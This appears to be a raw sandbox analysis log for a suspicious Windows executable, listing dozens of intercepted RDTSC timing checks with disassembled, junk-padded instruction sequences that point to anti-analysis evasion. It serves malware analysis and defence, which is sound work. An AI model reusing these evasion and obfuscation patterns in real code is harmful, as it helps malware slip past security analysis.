Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51C13B second address: 51C153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77A0B95E0Dh 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51C153 second address: 51C165 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F77A0BA2866h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51C165 second address: 51C169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51C169 second address: 51C16D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51C16D second address: 51C173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51C173 second address: 51C17C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51C17C second address: 51C18D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77A0B95E0Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51C18D second address: 51C1A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F77A0BA286Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51C1A5 second address: 51C1A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51AEC8 second address: 51AECC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51B178 second address: 51B18A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jl 00007F77A0B95E06h 0x0000000c jl 00007F77A0B95E06h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51B18A second address: 51B18E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51B18E second address: 51B1AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77A0B95E18h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51B1AC second address: 51B1C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77A0BA2870h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51ABC0 second address: 51ABC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51ABC4 second address: 51ABD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F77A0BA2866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51ABD0 second address: 51ABEA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F77A0B95E0Ah 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F77A0B95E0Ah 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51ABEA second address: 51ABEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51ABEE second address: 51ABF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51B866 second address: 51B880 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F77A0BA286Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51B880 second address: 51B884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51B884 second address: 51B898 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F77A0BA2866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c js 00007F77A0BA286Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51B898 second address: 51B8CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77A0B95E17h 0x00000009 jmp 00007F77A0B95E17h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51B8CE second address: 51B8D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51BA26 second address: 51BA54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jmp 00007F77A0B95E15h 0x00000010 pop eax 0x00000011 push esi 0x00000012 jmp 00007F77A0B95E0Bh 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51BA54 second address: 51BA5E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F77A0BA286Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51BBA6 second address: 51BBAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51BBAC second address: 51BBD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0BA2870h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edi 0x0000000d jng 00007F77A0BA2866h 0x00000013 pop edi 0x00000014 jo 00007F77A0BA286Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51BBD3 second address: 51BBEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jc 00007F77A0B95E06h 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 je 00007F77A0B95E06h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51BBEC second address: 51BBF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51BE4C second address: 51BE57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F77A0B95E06h 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51BE57 second address: 51BE63 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F77A0BA286Eh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4A2C7F second address: 4A2C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77A0B95E0Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4A2C93 second address: 4A2CCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F77A0BA2873h 0x0000000a jmp 00007F77A0BA286Ch 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007F77A0BA286Ch 0x00000018 jbe 00007F77A0BA2866h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4A2CCA second address: 4A2CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4A2CCE second address: 4A2CE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0BA2876h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4A2CE8 second address: 4A2CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4A2CEE second address: 4A2CF8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F77A0BA286Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 51FD62 second address: 51FD7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F77A0B95E15h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E283C second address: 4E284E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77A0BA286Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E284E second address: 4CBEBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0B95E0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e cmc 0x0000000f call dword ptr [ebp+122D30EAh] 0x00000015 pushad 0x00000016 push esi 0x00000017 jmp 00007F77A0B95E17h 0x0000001c je 00007F77A0B95E06h 0x00000022 pop esi 0x00000023 jmp 00007F77A0B95E16h 0x00000028 jo 00007F77A0B95E18h 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E2906 second address: 4E290C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E290C second address: 4E29B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0B95E13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F77A0B95E08h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov edi, 24289A30h 0x0000002b push dword ptr fs:[00000000h] 0x00000032 mov edi, dword ptr [ebp+122D39C1h] 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f mov dword ptr [ebp+1247758Dh], esp 0x00000045 stc 0x00000046 mov edx, dword ptr [ebp+122D30EAh] 0x0000004c cmp dword ptr [ebp+122D3B51h], 00000000h 0x00000053 jne 00007F77A0B95EAAh 0x00000059 call 00007F77A0B95E0Ah 0x0000005e mov dl, ECh 0x00000060 pop edi 0x00000061 mov byte ptr [ebp+122D32B1h], 00000047h 0x00000068 mov edx, 181B63F5h 0x0000006d mov eax, D49AA7D2h 0x00000072 clc 0x00000073 nop 0x00000074 push eax 0x00000075 push edx 0x00000076 jmp 00007F77A0B95E19h 0x0000007b rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E29B5 second address: 4E29D7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F77A0BA2871h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f je 00007F77A0BA2866h 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E2E68 second address: 4E2E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E2E6C second address: 4E2E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E2E72 second address: 4E2E77 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E2E77 second address: 4E2E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E2F22 second address: 4E2F28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E2F28 second address: 4E2F43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b movzx ecx, ax 0x0000000e nop 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 js 00007F77A0BA2866h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E2F43 second address: 4E2F58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0B95E0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E2F58 second address: 4E2F6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F77A0BA2866h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F77A0BA286Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 520315 second address: 520344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77A0B95E12h 0x00000009 popad 0x0000000a jmp 00007F77A0B95E0Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007F77A0B95E06h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 520344 second address: 520356 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F77A0BA2866h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 520356 second address: 520372 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77A0B95E12h 0x00000009 jne 00007F77A0B95E06h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 520372 second address: 520376 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 520376 second address: 52037C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5204DF second address: 5204FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F77A0BA2876h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5204FA second address: 52050D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F77A0B95E0Eh 0x00000008 jg 00007F77A0B95E06h 0x0000000e push esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 520783 second address: 520797 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F77A0BA2866h 0x00000008 jo 00007F77A0BA2866h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 520797 second address: 5207A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F77A0B95E06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 52091F second address: 52093F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F77A0BA2878h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 520A7C second address: 520AAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F77A0B95E13h 0x0000000a pushad 0x0000000b pushad 0x0000000c jno 00007F77A0B95E06h 0x00000012 jmp 00007F77A0B95E0Bh 0x00000017 push eax 0x00000018 pop eax 0x00000019 popad 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 52A2F4 second address: 52A2F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 529CB7 second address: 529CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 529CBB second address: 529CCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F77A0BA2866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 529F8B second address: 529F91 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 529F91 second address: 529FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F77A0BA286Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 49C1F6 second address: 49C213 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0B95E11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F77A0B95E0Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 49C22F second address: 49C235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 52F763 second address: 52F775 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77A0B95E0Ch 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 52F775 second address: 52F779 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 535D28 second address: 535D32 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F77A0B95E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5344FD second address: 534501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 53465F second address: 534669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 534669 second address: 53466F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 53466F second address: 534691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F77A0B95E13h 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F77A0B95E06h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5347EB second address: 5347FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jnp 00007F77A0BA2866h 0x0000000e popad 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 534AF7 second address: 534AFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 534AFB second address: 534B01 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 534B01 second address: 534B1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 jmp 00007F77A0B95E10h 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 534B1E second address: 534B31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jo 00007F77A0BA2878h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E3494 second address: 4E34E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 jne 00007F77A0B95E14h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F77A0B95E08h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov di, F055h 0x0000002c push 00000004h 0x0000002e mov dx, E6EAh 0x00000032 nop 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 pushad 0x00000037 popad 0x00000038 pushad 0x00000039 popad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4E34E7 second address: 4E34FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77A0BA2871h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 534DE3 second address: 534DE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 534F7F second address: 534F92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0BA286Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 535A12 second address: 535A1E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 535A1E second address: 535A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F77A0BA2866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5396CB second address: 5396D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
